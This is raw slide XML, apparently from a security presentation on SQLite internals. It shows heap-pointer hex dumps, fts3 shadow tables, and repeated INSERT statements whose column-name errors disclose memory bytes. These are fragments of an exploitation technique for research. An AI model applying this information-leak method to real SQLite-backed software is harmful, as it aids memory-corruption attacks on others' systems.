          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8181586" y="5325627"/>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8" name="Curved Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5185848" y="4956127"/>
            <a:ext cx="2995738" cy="478504"/>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1394372"/>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rgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8181586" y="5325627"/>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422153267"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3D 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9864437" y="5344003"/>
            <a:ext cx="267854" cy="21628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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534022" y="1012080"/>
            <a:ext cx="2612451" cy="216356"/>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3" name="Curved Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6361523" y="1707161"/>
            <a:ext cx="4115567" cy="3158116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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762085"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3D 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480628" y="381594"/>
            <a:ext cx="3566249" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤ = \x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>INSERT INTO table2100(“¤”) VALUES (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9864437" y="5344003"/>
            <a:ext cx="267854" cy="21628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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534022" y="1012080"/>
            <a:ext cx="2612451" cy="216356"/>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7" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046877" y="1120258"/>
            <a:ext cx="487145" cy="0"/>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3" name="Curved Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6361523" y="1707161"/>
            <a:ext cx="4115567" cy="3158116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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3636497"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3D 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480628" y="381594"/>
            <a:ext cx="3566249" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤ = \x01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>INSERT INTO table2100(“¤”) VALUES (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9864437" y="5344003"/>
            <a:ext cx="267854" cy="21628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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534022" y="1012080"/>
            <a:ext cx="2612451" cy="216356"/>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7" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046877" y="1120258"/>
            <a:ext cx="487145" cy="0"/>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3" name="Curved Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6361523" y="1707161"/>
            <a:ext cx="4115567" cy="3158116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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3104595"/>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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3D 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480628" y="381594"/>
            <a:ext cx="3566249" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤ = \x02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>INSERT INTO table2100(“¤”) VALUES (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9864437" y="5344003"/>
            <a:ext cx="267854" cy="21628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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5534022" y="1012080"/>
            <a:ext cx="2612451" cy="216356"/>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7" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046877" y="1120258"/>
            <a:ext cx="487145" cy="0"/>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3" name="Curved Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6361523" y="1707161"/>
            <a:ext cx="4115567" cy="3158116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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1607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Shadow Tables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158620" y="1825624"/>
            <a:ext cx="11905862" cy="4911078"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> VIRTUAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> fts3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
